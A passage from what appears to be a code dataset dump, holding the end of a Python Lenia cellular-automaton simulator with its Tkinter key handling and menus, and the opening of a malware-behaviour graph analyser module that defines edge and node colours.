self.analyzer.total_shift_idx.astype(int), (1, 0))\n\t\tif is_shift_zero and self.automaton.is_soft_clip:\n\t\t\tif vmin==0: vmin = np.amin(A)\n\t\tbuffer = np.uint8(np.clip((A-vmin) / (vmax-vmin), 0, 1) * 252) # .copy(order='C')\n\t\tif self.is_show_markers and ('grid' in markers or 'fixgrid' in markers):\n\t\t\tself.draw_grid(buffer, is_fixed='fixgrid' in markers)\n\t\tbuffer = np.repeat(np.repeat(buffer, PIXEL, axis=0), PIXEL, axis=1)\n\t\tzero = np.uint8(np.clip((0-vmin) / (vmax-vmin), 0, 1) * 252)\n\t\tfor i in range(PIXEL_BORDER):\n\t\t\tbuffer[i::PIXEL, :] = zero; buffer[:, i::PIXEL] = zero\n\t\tself.img = Image.frombuffer('P', (SIZEX*PIXEL,SIZEY*PIXEL), buffer, 'raw', 'P', 0, 1)\n\t\tif self.is_show_markers and ('arrow' in markers or 'ruler' in markers):\n\t\t\tself.draw_markers(markers)\n\n\tdef draw_black(self):\n\t\tsize = (SIZEX*PIXEL,SIZEY*PIXEL)\n\t\tself.img = Image.frombuffer('L', size, np.zeros(size), 'raw', 'L', 0, 1)\n\n\tdef draw_grid(self, buffer, is_fixed=False):\n\t\tR = self.world.params['R']\n\t\tn = R // 40 if R >= 15 else -1\n\t\tfor i in range(-n, n+1):\n\t\t\tsx, sy = 0, 0\n\t\t\tif self.is_auto_center and not is_fixed:\n\t\t\t\tsx, sy = (self.analyzer.total_shift_idx).astype(int)\n\t\t\tgrid = buffer[(MIDY - sy + i) % R:SIZEY:R, (MIDX - sx) % R:SIZEX:R]; grid[grid==0] = 253\n\t\t\tgrid = buffer[(MIDY - sy) % R:SIZEY:R, (MIDX - sx + i) % R:SIZEX:R]; grid[grid==0] = 253\n\n\tdef draw_markers(self, markers=[]):\n\t\tR, T = [self.world.params[k] for k in ('R', 'T')]\n\t\tmidpoint = np.array([MIDX, MIDY])\n\t\tdraw = ImageDraw.Draw(self.img)\n\t\td2 = np.array([1, 1]) * 2\n\t\tif 'arrow' in markers and self.analyzer.m_last_center is not None and self.analyzer.m_center is not None:\n\t\t\tshift = self.analyzer.total_shift_idx if not self.is_auto_center else np.zeros(2)\n\t\t\tm0 = self.analyzer.m_last_center * R + midpoint + shift - self.analyzer.last_shift_idx\n\t\t\tm1 = self.analyzer.m_center * R + midpoint + shift\n\t\t\tms = m1 % np.array([SIZEX, SIZEY]) - m1\n\t\t\tm2, m3 = [m0 + (m1 - m0) * n * T for n in [1,2]]\n\t\t\tfor i in range(-1, 2):\n\t\t\t\tfor j in range(-1, 2):\n\t\t\t\t\tadj = np.array([i*SIZEX, j*SIZEY]) + ms\n\t\t\t\t\tdraw.line(tuple((m0+adj)*PIXEL) + tuple((m3+adj)*PIXEL), fill=254, width=1)\n\t\t\t\t\t[draw.ellipse(tuple((m+adj-d2)*PIXEL) + tuple((m+adj+d2)*PIXEL), fill=c) for (m,c) in [(m0,254),(m1,255),(m2,255),(m3,255)]]\n\t\tif 'ruler' in markers:\n\t\t\tx0, y0 = SIZEX*PIXEL-20, SIZEY*PIXEL-20\n\t\t\tx1, x2, x3, y1, y2 = x0-10-R*PIXEL, x0-10-R*PIXEL//2, x0-10, y0+3, y0+8\n\t\t\tdraw.text((x0, y0), 'R', fill=254)\n\t\t\tdraw.line([(x1,y1),(x1,y2),(x2,y2),(x2,y1),(x2,y2),(x3,y2),(x3,y1)], fill=254, width=1)\n\t\tdel draw\n\n\tdef draw_stats(self):\n\t\tdraw = ImageDraw.Draw(self.img)\n\t\tseries = self.analyzer.series\n\t\tif series != [] and self.stats_mode in [2, 3]:\n\t\t\tseries = [series[-1]]\n\t\tif series != [] and series != [[]]:\n\t\t\tX = [[v[self.stat_x] for v in s] for s in series]\n\t\t\tY = [[v[self.stat_y] for v in s] for s in series]\n\t\t\t# if self.stat_x in [0,1] or self.stat_y in [0,1]:\n\t\t\t# \tX, Y = X[-100:], Y[-100:]\n\t\t\tif self.stat_x in [2, 3]: X = [[x - min(s) for x in s] for s in X]\n\t\t\tif self.stat_y in [2, 3]: Y = [[y - min(s) for y in s] for s in Y]\n\t\t\txmin, xmax = min(min(s) for s in X if s), max(max(s) for s in X if s)\n\t\t\tymin, ymax = min(min(s) for s in Y if s), max(max(s) for s in Y if s)\n\t\t\tif xmax-xmin>EPSILON and ymax-ymin>EPSILON:\n\t\t\t\tif self.stats_mode in [1, 2]:\n\t\t\t\t\tC = reversed([194 // 2**i + 61 for i in range(len(X))])\n\t\t\t\telse:\n\t\t\t\t\tC = [255] * len(X)\n\t\t\t\tfor x, y, c in zip(X, Y, C):\n\t\t\t\t\txa, ya = np.array(x), np.array(y)\n\t\t\t\t\txa = (xa - xmin) / (xmax - xmin) * (SIZEX - 10) + 5\n\t\t\t\t\tya = (ya - ymin) / (ymax - ymin) * (SIZEY - 10) + 5\n\t\t\t\t\tdraw.line(list(zip(xa, ya)), fill=c, width=1)\n\t\tdel draw\n\n\tdef calc_fps(self):\n\t\tif self.automaton.gen == 0:\n\t\t\tself.last_time = time.time()\n\t\telif self.automaton.gen % FPS_FREQ == 0:\n\t\t\tthis_time = time.time()\n\t\t\tself.fps = FPS_FREQ / (this_time - self.last_time)\n\t\t\tself.last_time = this_time\n\n\tSHIFT_KEYS = {'asciitilde':'quoteleft', 'exclam':'1', 'at':'2', 'numbersign':'3', 'dollar':'4', 'percent':'5', 'asciicircum':'6', 'ampersand':'7', 'asterisk':'8', 'parenleft':'9', 'parenright':'0', 'underscore':'-', 'plus':'equal', \\\n\t\t'braceleft':'bracketleft', 'braceright':'bracketright', 'bar':'backslash', 'colon':'semicolon', 'quotedbl':'quoteright', 'less':'comma', 'greater':'period', 'question':'slash'}\n\tdef key_press_event(self, event):\n\t\t''' TKInter keys: https://www.tcl.tk/man/tcl8.6/TkCmd/keysyms.htm '''\n\t\t# Win: shift_l/r(0x1) caps_lock(0x2) control_l/r(0x4) alt_l/r(0x20000) win/app/alt_r/control_r(0x40000)\n\t\t# Mac: shift_l(0x1) caps_lock(0x2) control_l(0x4) meta_l(0x8,command) alt_l(0x10) super_l(0x40,fn)\n\t\t# print('keysym[{0.keysym}] char[{0.char}] keycode[{0.keycode}] state[{1}]'.format(event, hex(event.state))); return\n\t\tkey = event.keysym\n\t\tstate = event.state\n\t\ts = 's+' if state & 0x1 or (key.isalpha() and len(key)==1 and key.isupper()) else ''\n\t\tc = 'c+' if state & 0x4 or (not is_windows and state & 0x8) else ''\n\t\ta = 'a+' if state & 0x20000 else ''\n\t\tkey = key.lower()\n\t\tif key in self.SHIFT_KEYS:\n\t\t\tkey = self.SHIFT_KEYS[key]\n\t\t\ts = 's+'\n\t\tself.last_key = s + c + a + key\n\t\tself.is_internal_key = False\n\n\tdef key_press_internal(self, key):\n\t\tself.last_key = key\n\t\tself.is_internal_key = True\n\n\tANIMAL_KEY_LIST = {'1':'O2(a)', '2':'OG2', '3':'OV2', '4':'P4(a)', '5':'2S1:5', '6':'2S2:2', '7':'P6,3s', '8':'2PG1:2', '9':'3H3', '0':'~gldr', \\\n\t\t's+1':'3G:4', 's+2':'3GG', 's+3':'K5(4,1)', 's+4':'K7(4,3)', 's+5':'K9(5,4)', 's+6':'3A5', 's+7':'4A6', 's+8':'2D10', 's+9':'4F12', 's+0':'~ggun', \\\n\t\t'c+1':'4Q(5,5,5,5):3', 'c+2':'2P7:2', 'c+3':'3GA', 'c+4':'K4(2,2):3', 'c+5':'K4(2,2):5', 'c+6':'3R4(3,3,2):4', 'c+7':'3F6', 'c+8':'4F7', 'c+9':'', 'c+0':'bbug'}\n\tdef process_key(self, k):\n\t\tglobal STATUS\n\t\tinc_or_dec = 1 if 's+' not in k else -1\n\t\tinc_10_or_1 = (10 if 's+' not in k else 1) if 'c+' not in k else 0 \n\t\tinc_big_or_not = 0 if 'c+' not in k else 1\n\t\tinc_1_or_10 = 1 if 's+' not in k else 10\n\t\tinc_mul_or_not = 1 if 's+' not in k else 0\n\t\tdouble_or_not = 2 if 's+' not in k else 1\n\t\tinc_or_not = 0 if 's+' not in k else 1\n\n\t\tis_ignore = False\n\t\tif not self.is_internal_key:\n\t\t\tself.stop_trace()\n\n\t\tif k in ['escape']: self.is_closing = True; self.close()\n\t\telif k in ['enter', 'return']: self.is_run = not self.is_run\n\t\telif k in [' ', 'space']: self.is_once = not self.is_once; self.is_run = False\n\t\telif k in ['quoteright']: self.is_show = not self.is_show\n\t\telif k in ['quoteleft', 's+quoteleft']: self.colormap_id = (self.colormap_id + inc_or_dec) % len(self.colormaps); self.set_colormap()\n\t\telif k in ['tab', 's+tab']: self.show_what = (self.show_what + inc_or_dec) % self.SHOW_WHAT_NUM\n\t\telif k in ['c+tab']: self.show_what = 0 if self.show_what == self.SHOW_WHAT_NUM else self.SHOW_WHAT_NUM\n\t\telif k in ['q', 's+q']: self.world.params['m'] += inc_10_or_1 * 0.001; self.analyzer.new_segment(); self.check_auto_load(); self.update = 'param'\n\t\telif k in ['a', 's+a']: self.world.params['m'] -= inc_10_or_1 * 0.001; self.analyzer.new_segment(); self.check_auto_load(); self.update = 'param'\n\t\telif k in ['w', 's+w']: self.world.params['s'] += inc_10_or_1 * 0.0001; self.analyzer.new_segment(); self.check_auto_load(); self.update = 'param'\n\t\telif k in ['s', 's+s']: self.world.params['s'] -= inc_10_or_1 * 0.0001; self.analyzer.new_segment(); self.check_auto_load(); self.update = 'param'\n\t\telif k in ['t', 's+t']: self.world.params['T'] = max(1, self.world.params['T'] * double_or_not + inc_or_not); self.update = 'param'\n\t\telif k in ['g', 's+g']: self.world.params['T'] = max(1, self.world.params['T'] // double_or_not - inc_or_not); self.update = 'param'\n\t\telif k in ['r', 's+r']: self.tx['R'] = max(1, self.tx['R'] + inc_10_or_1); self.transform_world(); self.update = 'param'\n\t\telif k in ['f', 's+f']: self.tx['R'] = max(1, self.tx['R'] - inc_10_or_1); self.transform_world(); self.update = 'param'\n\t\telif k in ['c+q', 's+c+q']: self.toggle_trace(+1, 's+' in k)\n\t\telif k in ['c+a', 's+c+a']: self.toggle_trace(-1, 's+' in k)\n\t\telif k in ['c+w', 's+c+w']: pass # randam params and/or peaks\n\t\telif k in ['c+r']: self.tx['R'] = DEF_R; self.transform_world(); self.update = 'param'\n\t\telif k in ['c+f']: self.tx['R'] = self.fore.params['R'] if self.fore else DEF_R; self.transform_world(); self.update = 'param'\n\t\telif k in ['c+y', 's+c+y']: self.automaton.kn = (self.automaton.kn + inc_or_dec - 1) % len(self.automaton.kernel_core) + 1; self.update = 'kn'\n\t\telif k in ['c+u', 's+c+u']: self.automaton.gn = (self.automaton.gn + inc_or_dec - 1) % len(self.automaton.field_func) + 1; self.update = 'gn'\n\t\telif k in ['c+i']: self.automaton.is_soft_clip = not self.automaton.is_soft_clip\n\t\telif k in ['c+o']: self.automaton.is_multi_step = not self.automaton.is_multi_step\n\t\telif k in ['c+p']: self.automaton.is_inverted = not self.automaton.is_inverted; self.world.params['T'] *= -1; self.world.params['m'] = 1 - self.world.params['m']; self.world.cells = 1 - self.world.cells\n\t\telif k in ['down', 's+down', 'c+down' ]: self.tx['shift'][0] += inc_10_or_1 + inc_big_or_not * 50; self.transform_world()\n\t\telif k in ['up', 's+up', 'c+up' ]: self.tx['shift'][0] -= inc_10_or_1 + inc_big_or_not * 50; self.transform_world()\n\t\telif k in ['right', 's+right', 'c+right']: self.tx['shift'][1] += inc_10_or_1 + inc_big_or_not * 50; self.transform_world()\n\t\telif k in ['left', 's+left', 'c+left' ]: self.tx['shift'][1] -= inc_10_or_1 + inc_big_or_not * 50; self.transform_world()\n\t\telif k in ['pageup', 's+pageup', 'c+pageup', 'prior', 's+prior', 'c+prior']: self.tx['rotate'] += inc_10_or_1 + inc_big_or_not * 45; self.transform_world()\n\t\telif k in ['pagedown', 's+pagedown', 'c+pagedown', 'next', 's+next' , 'c+next' ]: self.tx['rotate'] -= inc_10_or_1 + inc_big_or_not * 45; self.transform_world()\n\t\telif k in ['home' ]: self.tx['flip'] = 0 if self.tx['flip'] != 0 else -1; self.transform_world()\n\t\telif k in ['end' ]: self.tx['flip'] = 1 if self.tx['flip'] != 1 else -1; self.transform_world()\n\t\telif k in ['equal' ]: self.tx['flip'] = 2 if self.tx['flip'] != 0 else -1; self.transform_world()\n\t\telif k in ['s+equal']: self.tx['flip'] = 3 if self.tx['flip'] != 0 else -1; self.transform_world()\n\t\telif k in ['m']: self.is_auto_center = not self.is_auto_center\n\t\telif k in ['backspace', 'delete']: self.clear_world()\n\t\telif k in ['c', 's+c']: self.load_animal_id(self.animal_id - inc_1_or_10); self.update = 'animal'\n\t\telif k in ['v', 's+v']: self.load_animal_id(self.animal_id + inc_1_or_10); self.update = 'animal'\n\t\telif k in ['z']: self.load_animal_id(self.animal_id); self.update = 'animal'\n\t\telif k in ['x', 's+x']: self.load_part(self.fore, is_random=True, is_replace=False, repeat=inc_1_or_10)\n\t\telif k in ['b']: self.random_world()\n\t\telif k in ['n']: pass # random last seed\n\t\telif k in ['c+z']: self.is_auto_load = not self.is_auto_load\n\t\telif k in ['c+x']: self.is_layered = not self.is_layered\n\t\telif k in ['c+c', 's+c+c', 'c+s', 's+c+s']:\n\t\t\tA = copy.deepcopy(self.world)\n\t\t\tA.crop()\n\t\t\tdata = A.to_data(is_shorten='s+' not in k)\n\t\t\tif k.endswith('c'):\n\t\t\t\tself.clipboard_st = json.dumps(data, separators=(',', ':'), ensure_ascii=False)\n\t\t\t\tself.win.clipboard_clear()\n\t\t\t\tself.win.clipboard_append(self.clipboard_st)\n\t\t\t\t# print(self.clipboard_st)\n\t\t\t\tSTATUS.append(\"> board saved to clipboard\")\n\t\t\telif k.endswith('s'):\n\t\t\t\twith open('saved.rle', 'w', encoding='utf8') as file:\n\t\t\t\t\tfile.write('#N '+A.long_name()+'\\n')\n\t\t\t\t\tfile.write('x = '+str(A.cells.shape[1])+', y = '+str(A.cells.shape[0])+', rule = Lenia('+A.params2st()+')\\n')\n\t\t\t\t\tfile.write(data['cells'].replace('$','$\\n')+'\\n')\n\t\t\t\tdata['cells'] = data['cells'].split('$')\n\t\t\t\twith open('saved.json', 'w', encoding='utf-8') as file:\n\t\t\t\t\tjson.dump(data, file, indent=4, ensure_ascii=False)\n\t\t\t\twith open('saved.csv', 'w', newline='\\n') as file:\n\t\t\t\t\twriter = csv.writer(file)\n\t\t\t\t\twriter.writerow([self.analyzer.stat_name(x=x) for x in self.analyzer.STAT_HEADERS])\n\t\t\t\t\twriter.writerows([e for l in self.analyzer.series for e in l])\n\t\t\t\tSTATUS.append(\"> data and image saved to 'saved.*'\")\n\t\t\t\tself.is_save_image = True\n\t\telif k in ['c+v']:\n\t\t\tself.clipboard_st = self.win.clipboard_get()\n\t\t\tdata = json.loads(self.clipboard_st)\n\t\t\tself.load_part(Board.from_data(data))\n\t\telif k in ['c+d', 's+c+d']: self.recorder.toggle_recording(is_save_frames='s+' in k)\n\t\telif k in ['c+g']:\n\t\t\tif self.automaton.has_gpu:\n\t\t\t\tself.automaton.is_gpu = not self.automaton.is_gpu\n\t\telif k in [m+str(i) for i in range(10) for m in ['','s+','c+','s+c+']]: self.load_animal_code(self.ANIMAL_KEY_LIST.get(k)); self.update = 'animal'\n\t\telif k in ['comma']: self.update = 'animal'\n\t\telif k in ['period']: self.update = 'param'\n\t\telif k in ['h']: self.is_show_markers = not self.is_show_markers\n\t\telif k in ['c+h']: self.is_show_fps = not self.is_show_fps\n\t\telif k in ['j', 's+j']: self.stats_mode = (self.stats_mode - inc_or_dec) % 4\n\t\telif k in ['c+j']: self.analyzer.clear_segment()\n\t\telif k in ['s+c+j']: self.analyzer.clear_series()\n\t\telif k in ['k', 's+k']:\n\t\t\tif self.stats_mode == 0: self.stats_mode = 3\n\t\t\twhile True:\n\t\t\t\tself.stat_x = (self.stat_x + inc_or_dec) % len(self.analyzer.STAT_HEADERS); self.update = 'stats'\n\t\t\t\tif self.stat_x != self.stat_y and self.stat_x > 2: break\n\t\telif k in ['l', 's+l']:\n\t\t\tif self.stats_mode == 0: self.stats_mode = 3\n\t\t\twhile True:\n\t\t\t\tself.stat_y = (self.stat_y + inc_or_dec) % len(self.analyzer.STAT_HEADERS); self.update = 'stats'\n\t\t\t\tif self.stat_x != self.stat_y and self.stat_y > 2: break\n\t\telif k in ['c+k']: self.analyzer.is_clip_segment = not self.analyzer.is_clip_segment\n\t\t# elif k in ['slash']: m = self.menu.children[self.menu_values['animal'][0]].children['!menu']; m.post(self.win.winfo_rootx(), self.win.winfo_rooty())\n\t\telif k.endswith('_l') or k.endswith('_r'): is_ignore = True\n\t\telse: self.excess_key = k\n\n\t\tif not is_ignore and self.is_loop:\n\t\t\tself.world.params = {k:round(x, ROUND) if type(x)==float else x for (k,x) in self.world.params.items()}\n\t\t\tself.tx = {k:round(x, ROUND) if type(x)==float else x for (k,x) in self.tx.items()}\n\t\t\tA = self.world.cells.copy()\n\t\t\tself.automaton.calc_once()\n\t\t\t# self.analyzer.calc_stat()\n\t\t\tself.world.cells = A\n\t\t\tself.update_menu()\n\n\tdef get_acc_func(self, key, acc, animal_id=None):\n\t\tacc = acc if acc else key if key else None\n\t\tif acc: acc = acc.replace('s+','Shift+').replace('c+','Ctrl+').replace('m+','Cmd+').replace('a+','Slt+')\n\t\tif animal_id:\n\t\t\tfunc = lambda:self.load_animal_id(int(animal_id))\n\t\telse:\n\t\t\tfunc = lambda:self.key_press_internal(key.lower()) if key else None\n\t\tstate = 'normal' if key or animal_id else tk.DISABLED\n\t\treturn {'accelerator':acc, 'command':func, 'state':state}\n\tdef create_submenu(self, parent, items):\n\t\tm = tk.Menu(parent, tearoff=True)\n\t\tm.seq = 0\n\t\tfor i in items:\n\t\t\tm.seq += 1\n\t\t\tif i is None or i=='':\n\t\t\t\tm.add_separator()\n\t\t\telif type(i) in [tuple, list]:\n\t\t\t\tm.add_cascade(label=i[0], menu=self.create_submenu(m, i[1]))\n\t\t\telse:\n\t\t\t\tfirst, text, key, acc, *_ = i.split('|') + ['']*2\n\t\t\t\tkind, name = first[:1], first[1:]\n\t\t\t\tif first=='':\n\t\t\t\t\tm.add_command(label=text, **self.get_acc_func(key, acc))\n\t\t\t\telif kind=='^':\n\t\t\t\t\tself.menu_vars[name] = tk.BooleanVar(value=self.get_nested_attr(name))\n\t\t\t\t\tm.add_checkbutton(label=text, variable=self.menu_vars[name], **self.get_acc_func(key, acc))\n\t\t\t\telif kind=='@':\n\t\t\t\t\tself.menu_values[name] = (m._name, m.seq, text)\n\t\t\t\t\tm.add_command(label='', **self.get_acc_func(key, acc)) # background='dark green', foreground='white'\n\t\t\t\telif kind=='#':\n\t\t\t\t\tself.menu_params[name] = (m._name, m.seq, text)\n\t\t\t\t\tm.add_command(label='', state=tk.DISABLED) # background='navy', foreground='white')\n\t\t\t\telif kind=='&':\n\t\t\t\t\tm.add_command(label=text, **self.get_acc_func(key, acc, animal_id=name))\n\t\treturn m\n\tdef get_animal_nested_list(self):\n\t\troot = []\n\t\tstack = [root]\n\t\tid = 0\n\t\tfor data in self.animal_data:\n\t\t\tcode = data['code']\n\t\t\tif code.startswith('>'):\n\t\t\t\tnext_level = int(code[1:])\n\t\t\t\td = len(stack) - next_level\n\t\t\t\tfor i in range(d):\n\t\t\t\t\tstack.pop()\n\t\t\t\tfor i in range(max(-d, 0) + 1):\n\t\t\t\t\tnew_list = ('{name} {cname}'.format(**data), [])\n\t\t\t\t\tstack[-1].append(new_list)\n\t\t\t\t\tstack.append(new_list[1])\n\t\t\telse:\n\t\t\t\tstack[-1].append('&{id}|{name} {cname}|'.format(id=id, **data))\n\t\t\tid += 1\n\t\treturn root\n\n\tdef get_nested_attr(self, name):\n\t\tobj = self\n\t\tfor n in name.split('.'):\n\t\t\tobj = getattr(obj, n)\n\t\treturn obj\n\tdef get_value_text(self, name):\n\t\tif name=='anm': return '#'+str(self.animal_id+1)+' '+self.world.long_name()\n\t\telif name=='kn': return [\"Polynomial\",\"Exponential\",\"Step\",\"Staircase\"][(self.world.params.get('kn') or self.automaton.kn) - 1]\n\t\telif name=='gn': return [\"Polynomial\",\"Exponential\",\"Step\"][(self.world.params.get('gn') or self.automaton.gn) - 1]\n\t\telif name=='clr': return [\"Vivid blue/red\",\"Vivid green/purple\",\"Vivid red/green\",\"Pale blue/red\",\"Pale green/purple\",\"Pale yellow/green\",\"Black/white\"][self.colormap_id]\n\t\telif name=='shw': return [\"World\",\"Potential\",\"Field\",\"Change\",\"Kernel\",\"World FFT\",\"Potential FFT\",\"Colormap\"][self.show_what]\n\t\telif name=='stm': return [\"None\",\"All\",\"Segment\",\"Overlay\"][self.stats_mode]\n\t\telif name=='stx': return self.analyzer.stat_name(i=self.stat_x)\n\t\telif name=='sty': return self.analyzer.stat_name(i=self.stat_y)\n\tdef update_menu(self):\n\t\tfor name in self.menu_vars:\n\t\t\tself.menu_vars[name].set(self.get_nested_attr(name))\n\t\tfor (name, info) in self.menu_params.items():\n\t\t\tvalue = '['+Board.fracs2st(self.world.params[name])+']' if name=='b' else self.world.params[name]\n\t\t\tself.menu.children[info[0]].entryconfig(info[1], label='{text} ({param} = {value})'.format(text=info[2], param=name, value=value))\n\t\tfor (name, info) in self.menu_values.items():\n\t\t\tvalue = self.get_value_text(name)\n\t\t\tself.menu.children[info[0]].entryconfig(info[1], label='{text} [{value}]'.format(text=info[2], value=value))\n\n\tPARAM_TEXT = {'m':'Field center', 's':'Field width', 'R':'Space units', 'T':'Time units', 'dr':'Space step', 'dt':'Time step', 'b':'Kernel peaks'}\n\tVALUE_TEXT = {'anm':'Animal', 'kn':'Kernel core', 'gn':'Field', 'shw':'Show', 'clr':'Colors'}\n\tdef create_menu(self):\n\t\tself.menu_vars = {}\n\t\tself.menu_params = {}\n\t\tself.menu_values = {}\n\t\tself.menu = tk.Menu(self.win, tearoff=True)\n\t\tself.win.config(menu=self.menu)\n\n\t\titems2 = ['^automaton.is_gpu|Use GPU|c+G' if self.automaton.has_gpu else '|No GPU available|']\n\t\tself.menu.add_cascade(label='Main', menu=self.create_submenu(self.menu, [\n\t\t\t'^is_run|Start|Return', '|Once|Space'] + items2 + [None,\n\t\t\t'^is_show|Show|Quoteright|\\'', '@shw|Show|Tab', '|Show colormap|c+Tab', '@clr|Colors|QuoteLeft|`', None,\n\t\t\t'^is_show_markers|Show markers|H', '^is_show_fps|Show FPS|c+H', None,\n\t\t\t'@stm|Show stats|J', '@stx|Stats X axis|K', '@sty|Stats Y axis|L', \n\t\t\t'|Clear segment|c+J', '|Clear all|s+c+J', '^analyzer.is_clip_segment|Clip segments|c+K', None, \n\t\t\t'|Save data & image|c+S', '|Save with expanded format|s+c+S', \n\t\t\t'^recorder.is_recording|Record video & gif|c+D', '|Record with frames saved|s+c+D', None,\n\t\t\t'|Quit|Escape']))\n\n\t\tself.menu.add_cascade(label='View', menu=self.create_submenu(self.menu, [\n\t\t\t'^is_auto_center|Auto center|c+M', None,\n\t\t\t'|(Small adjust)||s+Up', '|(Large adjust)||m+Up',\n\t\t\t'|Move up|Up', '|Move down|Down', '|Move left|Left', '|Move right|Right',\n\t\t\t'|Rotate clockwise|PageUp', '|Rotate anti-clockwise|PageDown', None,\n\t\t\t'|Flip vertically|Home', '|Flip horizontally|End',\n\t\t\t'|Mirror horizontally|Equal|=', '|Mirror flip|s+Equal|+']))\n\n\t\titems2 = []\n\t\t# for (key, code) in self.ANIMAL_KEY_LIST.items():\n\t\t\t# id = self.get_animal_id(code)\n\t\t\t# if id: items2.append('|{name} {cname}|{key}'.format(**self.animal_data[id], key=key))\n\t\tself.menu.add_cascade(label='Animal', menu=self.create_submenu(self.menu, [\n\t\t\t'|Show animal name|Comma|,', '|Place at center|Z', '|Place at random|X',\n\t\t\t'|Previous animal|C', '|Next animal|V', '|Previous 10|s+C', '|Next 10|s+V', None,\n\t\t\t'|Shortcuts 1-10|1', '|Shortcuts 11-20|s+1', '|Shortcuts 21-30|c+1', None,\n\t\t\t('Full list', self.get_animal_nested_list())]))\n\n\t\tself.menu.add_cascade(label='World', menu=self.create_submenu(self.menu, [\n\t\t\t'|Clear|Backspace', '|Random|B', '|Random (last seed)|N', None,\n\t\t\t'^is_auto_load|Auto put (place/paste/random)|c+Z', '^is_layered|Layer mode|c+X', None,\n\t\t\t'|Copy|c+C', '|Paste|c+V']))\n\n\t\titems2 = ['|Fewer peaks|BracketLeft|[', '|More peaks|BracketRight|]', None]\n\t\tfor i in range(5):\n\t\t\titems2.append('|Taller peak {n}|{key}'.format(n=i+1, key='YUIOP'[i]))\n\t\t\titems2.append('|Shorter peak {n}|{key}'.format(n=i+1, key='s+'+'YUIOP'[i]))\n\t\titems2 += [None, '|Random peaks & field|s+c+W']\n\n\t\t# '@anm||', '#m|Field center', '#s|Field width', '#R|Space units', '#T|Time units', '#b|Kernel peaks', \n\t\tself.menu.add_cascade(label='Params', menu=self.create_submenu(self.menu, [\n\t\t\t'|Show params|Period|.', None,\n\t\t\t'|(Small adjust)||s+Q', '|Higher field (m + 0.01)|Q', '|Lower field (m - 0.01)|A',\n\t\t\t'|Wider field (s + 0.001)|W', '|Narrower field (s - 0.001)|S', None,\n\t\t\t'|Bigger size (R + 10)|R', '|Smaller size (R - 10)|F',\n\t\t\t'|Slower speed (T * 2)|T', '|Faster speed (T / 2)|G', None,\n\t\t\t('Peaks', items2), None,\n\t\t\t'|Trace field higher|c+Q', '|Trace field lower|c+A', \n\t\t\t'|Random field|c+W', '|Reset size|c+R', '|Animal\\'s original size|c+F', None,\n\t\t\t'@kn|Kernel|c+Y', '@gn|Field|c+U',\n\t\t\t'^automaton.is_soft_clip|Use soft clip|c+I', '^automaton.is_multi_step|Use multi-step|c+O', \n\t\t\t'^automaton.is_inverted|Invert|c+P']))\n\n\tdef update_info(self):\n\t\tglobal STATUS\n\t\tif self.excess_key:\n\t\t\tprint(self.excess_key)\n\t\t\tself.excess_key = None\n\t\tif self.update or STATUS or self.is_show_fps:\n\t\t\tinfo_st = \"\"\n\t\t\tif STATUS: info_st = \"\\n\".join(STATUS)\n\t\t\telif self.is_show_fps and self.fps: info_st = 'FPS: {0:.1f}'.format(self.fps)\n\t\t\telif self.update == 'param': info_st = self.world.params2st()\n\t\t\telif self.update == 'animal': info_st = self.world.long_name()\n\t\t\telif self.update == 'stats': info_st = 'X axis: {0}, Y axis: {1}'.format(self.analyzer.stat_name(i=self.stat_x), self.analyzer.stat_name(i=self.stat_y))\n\t\t\telif self.update in self.menu_values: info_st = \"{text} [{value}]\".format(text=self.VALUE_TEXT[self.update], value=self.get_value_text(self.update))\n\t\t\tself.info.config(text=info_st)\n\t\t\tSTATUS = []\n\t\t\tself.update = None\n\t\t\tif self.clear_job is not None:\n\t\t\t\tself.win.after_cancel(self.clear_job)\n\t\t\tself.clear_job = self.win.after(5000, self.clear_info)\n\n\tdef clear_info(self):\n\t\tself.info.config(text=\"\")\n\t\tself.clear_job = None\n\n\tdef loop(self):\n\t\tself.is_loop = True\n\t\tself.win.after(0, self.run)\n\t\tself.win.protocol('WM_DELETE_WINDOW', self.close)\n\t\tself.win.mainloop()\n\n\tdef close(self):\n\t\tself.is_loop = False\n\t\tif self.recorder.is_recording:\n\t\t\tself.recorder.finish_record()\n\t\tself.win.destroy()\n\n\tdef run(self):\n\t\twhile self.is_loop:\n\t\t\tif self.last_key:\n\t\t\t\tself.process_key(self.last_key)\n\t\t\t\tself.last_key = None\n\t\t\tif self.is_closing:\n\t\t\t\tbreak\n\t\t\tif self.is_run or self.is_once:\n\t\t\t\tself.calc_fps()\n\t\t\t\tself.automaton.calc_once()\n\t\t\t\tself.analyzer.center_world()\n\t\t\t\tself.analyzer.calc_stat()\n\t\t\t\tself.analyzer.add_stat()\n\t\t\t\tif not self.is_layered:\n\t\t\t\t\tself.back = None\n\t\t\t\t\tself.clear_transform()\n\t\t\t\tif self.trace_dir != 0:\n\t\t\t\t\tself.trace_params()\n\t\t\t\tself.is_once = False\n\t\t\tself.update_info()\n\t\t\tif self.is_show:\n\t\t\t\tself.update_win()\n\t\t\telse:\n\t\t\t\tself.win.update()\n\nif __name__ == '__main__':\n\tlenia = Lenia()\n\tlenia.load_animal_code(lenia.ANIMAL_KEY_LIST['2'])\n\tlenia.update_menu()\n\tlenia.loop()\n\n''' for PyOpenCL in Windows:\ninstall Intel OpenCL SDK\ninstall Microsoft Visual C++ Build Tools\nin Visual Studio Native Tools command prompt\n> set INCLUDE=%INCLUDE%;%INTELOCLSDKROOT%include\n> set LIB=%LIB%;%INTELOCLSDKROOT%lib\\x86\n> pip3 install pyopencl\n'''\n","sub_path":"Python/Lenia.py","file_name":"Lenia.py","file_ext":"py","file_size_in_byte":53178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"522233226","text":"#!/usr/bin/python\nimport json\nimport os.path\nimport re\nimport uuid\n\nfrom malwrlyse.packages.db import DB\n\n\nclass GraphColors(object):\n EDGE_INJECT = '#990000' # darkred\n EDGE_PROCESS = '#000033' # darkblue\n EDGE_THREAD = '#0066FF' # lightblue\n EDGE_FILEHANDLE = '#CC6600' # orange # files belonging to a thread\n EDGE_FILEWRITE = '#FF6600' # orange light\n EDGE_FILEDELETE = '#FF9900' # orange\n EDGE_FILECREATE = '#FFCC00' # orange\n EDGE_FILESETINFO = '#FF3300' # orange dark\n NODE_FILEITEM = '#CC6600' # orange\n NODE_THREADITEM = '#0066FF' # lightblue\n NODE_MALICIOUSPROC = '#006600' # green\n NODE_PROCESSITEM = '#000033' # darkblue\n\n\nclass Analyser(DB):\n def __init__(self, filename):\n super(self.__class__, self).__init__()\n\n self.filename = filename\n self.tablename = os.path.basename(self.filename)\n\n self.root_pid = None\n self.all_thread_ids = 